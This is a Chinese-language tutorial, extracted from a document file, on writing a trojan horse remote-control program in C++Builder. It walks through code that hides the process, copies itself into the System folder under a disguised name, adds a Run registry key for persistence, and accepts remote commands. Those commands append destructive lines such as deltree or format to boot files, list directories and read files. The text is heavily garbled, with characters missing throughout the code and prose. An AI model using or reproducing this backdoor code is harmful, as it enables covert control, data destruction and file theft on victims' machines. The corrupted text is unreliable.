木马编写培训教程.docx

1、木马编写培训教程 木马的编写实例特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Bck Orfce以来，木马犹如平地上的惊雷, 使在osindow时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面,一时间人心惶惶。 我那时在电脑报上看到一篇文章，大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救！要知道,木马(rojn）的历史是很悠久的：早在A&T Ux和BSnix十分盛行的年代，木马是由一些玩程式（主要是C)水平很高的年轻人（主要是老美）用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那

2、时木马的主要方法是诱骗先修改你的.prf文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件,用Eml的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Do的熏陶下长大的，对网络可以说很陌生。直到Winx横空出世，尤其是WinNt的普及,大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Wi9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。 自己编写木马，听起来很Coo是不是？！木马一定是由两部分组成服务器程序（Serr)和客户端程序(Client),服务器负责打开攻击的道路,就像

3、一个内奸特务；客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是CP/P协议）。为了让大家更好的了解木马攻击技术,破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。 首先是编程工具的选择。目前流行的开发工具有+Builer、VC、V和Dlpi,这里我们选用C+uildr（以下简称C);V虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上,我们选用可视化的BCB；Dlphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO00源代码,是编写的,网上俯拾皆是)；VB嘛,谈都

4、不谈难道你还给受害者传一个1兆多的动态链接库Msvbv0ll吗?启动CBude 5.0企业版，新建一个工程,添加三个VC控件：一个是Ieet页中的Serer Socket,另两个是Fastnet页中的NM。Ser Soket的功能是用来使本程序变成一个服务器程序，可以对外服务(对攻击者敞开大门）。cet最初是在Unix上出现的，后来微软将它引入了indos中(包括Wi8和WiNt)；后两个控件的作用是用来使程序具有TranfePoocl文件传输协议）和SMTP(Smpe Mal Transfr Protoo简单邮件传输协议）功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。Fom

5、窗体是可视的,这当然是不可思议的。不光占去了大量的空间（光一个Frm就有3之大),而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delp用过程实现的小程序一般只有7K左右那样。 我们首先应该让我们的程序能够隐身。双击orm,首先在rmCrat事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Sevce的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用isterServicroces(）函数注册成服务进程（Svice P

6、roce）就可以了。不过该函数的声明在Borlad预先打包的头文件中没有,那么我们只好自己来声明这个位于KENEL3.DL中的鸟函数了。首先判断目标机的操作系统是Win还是nNt：ORD dwVsion etVrson(）;/ 得到操作系统的版本号if (wVeon =08000000)/ 操作系统是Win9x，不是WinNt typdef WORD （CALLBACKRGISTESEVICEPCS)（WORD,DWRD); /定义RegtrevicePoces（)函数的原型 INSANCE hL; LRISTERSERVICEPROES pestrServcePocss; hDLL = Ld

7、Liba（KERN2）; /加载egiterSeicePoces（)函数所在的动态链接库KERNEL32DL lRegisterevicePess = （LPREGIRSERVCERCES）GetPoAdress(h,eisteServieroess）; /得到RgisterServicee()函数的地址 lpeisServiePss（eurrenPrcessId(）,1）; /执行RiterServePocess(）函数,隐藏本进程 Feeibrar（hDLL); /卸载动态链接库 这样就终于可以隐身了（害我敲了这么多代码!）。为什么要判断操作系统呢？因为nt中的进程管理器可以对当前进程一览

8、无余，因此没必要在Wit下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。接着再将自己拷贝一份到%System%目录下，例如：C:WndowSytem,并修改注册表，以便启动时自动加载:ch TempathA_PATH;/定义一个变量GetStmDirtory(mpPa ,M_AT）;/Tpath是sste目录缓冲区的地址,MAXPATH是缓冲区的大小，得到目标机的System目录路径SytemPat=AsiSrng(TemPth）;/格式化TempPath字符串，使之成为能供编译器使用的样式Cy（)c_st（）， AnsSng(ytPth+api32.ex）.c_t(),LE)

9、；/将自己拷贝到%Systm%目录下，并改名为Ta32.exe，伪装起来Ristr=n gstry;/定义一个TRstry对象,准备修改注册表,这一步必不可少Registy-RtKeyKEY_LOA_MCIE;/设置主键为KE_C_AHIRistry-peKy（owreMicrosoftindwsCurenVersionRun,RUE);/打开键值SotwareMrsoftWndowsCurntersionRun，如果不存在，就创建之try /如果以下语句发生异常，跳至catch,以避免程序崩溃if(Reistry-Redting（rossbw)！=Syma+ai32.ex） giy-WieS

10、trig(sbw，SstmPah+Tapi3e）; /查找是否有“crosow”字样的键值，并且是否为拷贝的目录%Systm%+p32ee /如果不是,就写入以上键值和内容cth(.） /如果有错误,什么也不做 好，rmCre过程完成了，这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。 接着选中SevrSocet控件,在左边的Obec Inspetor中将ctive改为tru，这样程序一启动就打开特定端口，处于服务器工作状态。再将Prt填入44,这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但

11、可能会与基本网络协议使用的端口相冲突,而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口,因为如果引起冲突，Windo也不会报错 _)。你可以看一看NMF控件使用的端口,是21号端口,这是FTP协议的专用控制端口( Prt）；同理TMSTP的2号端口也是SMTP协议的专用端口。再选中Serokt控件,点击vents页，双击Onlientd事件，敲入以下代码: FILE*LL; char * cntn; it es_of_tr;ar Tem; /定义了一堆待会儿要用到的变量sritf（TmpFil， %s, AniString（SystemPath+n

12、siString（Wn36.BA)_t()）;/在%Sstem%下建立一个文本文件Win369.bt,作为临时文件使用 AsiStri ep=Soct-eceieText（); /接收客户端(攻击者,也就是你自己）传来的数据好，大门敞开了！接着就是修改目标机的各种配置了! 首先我们来修改Autexec.bat和Cofig.sy吧:i（tmp.SuStrg(0,9）=dt conf） /如果接受到的字符串的前9个字符是“edton”itumber=mength（）;/得到字符串的长度 int （(tep.uSring(11,）.c_str(）); /将第11个字符转换成tee型，存入变量 /为什

13、么要取第11个字符,因为第10个字符是空格字符ontent=（tem.SubSing（1,number-1）+n）._tr(）; /余下的字符串将被作为写入的内容写入目标文件 FILE *fp=NUL; cha 20； chmod（c:utoexec.ba,SIREDS_IWIE）; hmd(:cofi.sys,S_IE_WRITE)； /将两个目标文件的属性改为可读可写 i(） pritf(,%s,c:atexec.bat)； /如果第11个字符是1,就把Autoecbat格式化 else if() sprintf（,%s,:configys); /如果第11个字符是，就把Con.ss格式化

14、 timeof_tr=； /定义计数器 il（f=L) /如果指针是空 fp=fopen（，a）; /如果文件不存在,创建之;如果存在,准备在其后添加 /如果出错，文件指针为空，这样就会重复 es_of_=me_of_ty+1; /计数器加1 i（tme_f_ry10) /如果已经试了100次了,仍未成功 Socket-Sendext（Fail ByOnFile); /就发回“al By On il”的错误信息 goto END； /跳至END处 fwri(conten，sieof(char）,stn（conten），fp); /写入添加的语句,例如delte/y ：或者formtq/tots

15、t C:，够毒吧?! fcose（f)； /写完后关闭目标文件 SocketSendTet(Suces); /然后发回“uccss”的成功信息 你现在可以通过网络来察看目标机上的这两个文件了，并且还可以向里面随意添加任何命令。呵呵,这只不过是牛刀小试罢了。朋友,别走开!（未完待续）上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲啰：else if(mp.Subing（0，3）=ir） /如果前3个字符是“dir”i Rad_Num;hr CR_LF=n； ittri; chr*； DR di; strt dir *en

16、t； intnmr=tempeng(）； /得到字符串的长度 AnsiSrng DirNae=tmpSuStrin（5，number3); /从字符串第六个字符开始，将后面的字符存入DrName变量,这是目录名 if(Dir_Name=) /如果目录名为空 SoketSndTx(Fail Bypen DIRs Name）； /返回“ai y OenIs am”信息 to END; /跳到EN char * iname； dirme=Dir_Namc_str()； if(dir opendr(diae)= NULL） /如果打开目录出错ockt-SenText(Fail by yorIs ame

17、!); /返回“FaiByYr DRsName”信息 gooED; /跳到END times_ofr=0; whl（f=NUL) /如果指针是L p=fpen(empFie，w+); /就创建ysteWin69.t准备读和写;如果此文件已存在,则会被覆盖 tmes_o_try=tmes_of_try+; /计数器加1if（ties_of_y100) /如果已经试了00次了,仍未成功(真有耐心!) SoetSedTt(Fa By Opn File）; /就发回“Fail By OenFile”的错误信息gotoEND； /并跳到END处 whe(（et readdir（di)） != NU) /

18、如果访问目标目录成功 if（*(Anstrig（drnme).AnsLastCha（)!) /如果最后一个字符不是“”，证明不是根目录 (nsitig(dirname)+nt-dnae）.c_t(）; 加上“”字符后将指针指向目录流 els （AnsiSing(dirnme）+ent-d_nae）.c_tr(）; /如果是根目录，则不用加“” trib=_t_chmod（, 0)； /得到目标文件的访问属性 if (atrb A_RDONLY) /“&”字符是比较前后两个变量，如果相同返回1,否则返回 frit（ R，sizeof（cha），3,）; /将目标文件属性设为只读 ese fwit

19、e( ,szeof（chr),3,fp）； /失败则写入空格 i （ari FAHIEN） fwrie(H,sizeof(car），1,p)； /将目标文件属性设为隐藏 frite（ ,seof（char),，fp); /失败则写入空格 if(attibFASYTE） fwrite（S,ef（cha)，1,p); /将目标文件属性设为系统 else fwrite（ ,sze（cha)，f); /失败则写入空格 if (atrib F_ARCH) fwrite(,sieo(hr)，1，fp）; /将目标文件属性设为普通 else fwrte（，szeo（cha），1,fp)； /失败则写入空格

20、f （tri & FA_DIEC） frie（ ，izo（hr)，9,f); /将目标文件属性设为目录 els frit（ ,sio(char），9，p)； /失败则写入空格 fwrte(et-d_ne,sieof（cha)，slen（ent-_nae),fp）； /将目录名写入目标文件frite（C_F，1,1，p）； /写入换行 se（f）; /关闭文件 coedi（dir）; /关闭目录 ILE *p1=NUL; times_of_try=; hi（p=L） fpon(TempFi,r）； /打开Win69.at准备读 timesf_y=imes_try+1; /计数器加 if(m_of

21、try10） /如果已经试了1次了，仍未成功 Socket-SendText（FaiByOpen File）; /就发回“al By Open File”的错误信息 ooND; /并跳到处 AnStingReurText=； ha emp_ontent300； fo（ i=；i00;i)tepnteni=0; /定义的一个空数组 Read_um=fread(tem_contet,1，30,p1）; /从目标文件中读入前300个字符 while（Rea_Nm=30) etrn_e=RturnTtmponten； /Rturn_Text变量加上刚才的30个字符 fr（it i;iSenText（R

22、eur_Tet）； /返回un_Tet变量的内容够长吧?!察看目录树这么费劲啊？!你后面可以用B中的各种列表框对Cienxe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“tye”命令，（手指累不累啊？)：else f（emp.SuSrn(0，4）=tye） /如果前4个字符是“tpe”nt RedNum； nt umber=tmp.ength(）; AnsSrin (6，nmbr-4）; /将目标文件流存入变量中 tmesof_try=0;while(fp=NLL） f=fope（)，r); /打开目标文件准备读 time_f_try=times_f_try+1; /计数器

23、加1 if（es_try00) /如果已试了100次了 Socket-SendTex（il y Ope Fle）; 返回“Fail By pen ie”的错误信息 oto END; /跳到ED Anitrin Rrn_Tet=； chr tp_content00； for(n i=;0;i+） temp_cotnt=; /定义一个空数组 Read_Num=fad（em_cnn，1,3,fp); /从目标文件中读入前300个字符 hle(Rad_Num=300） turnext=Return_et+temcntet; /eturnxt的内容加上刚才的字符 for（int 0；iendTet（etnext）;/返回Retrn_Text的内容，即你查看文件的内容 咳咳！累死了!还是来点轻松的吧操纵目标机的光驱(注意:ciSendSring（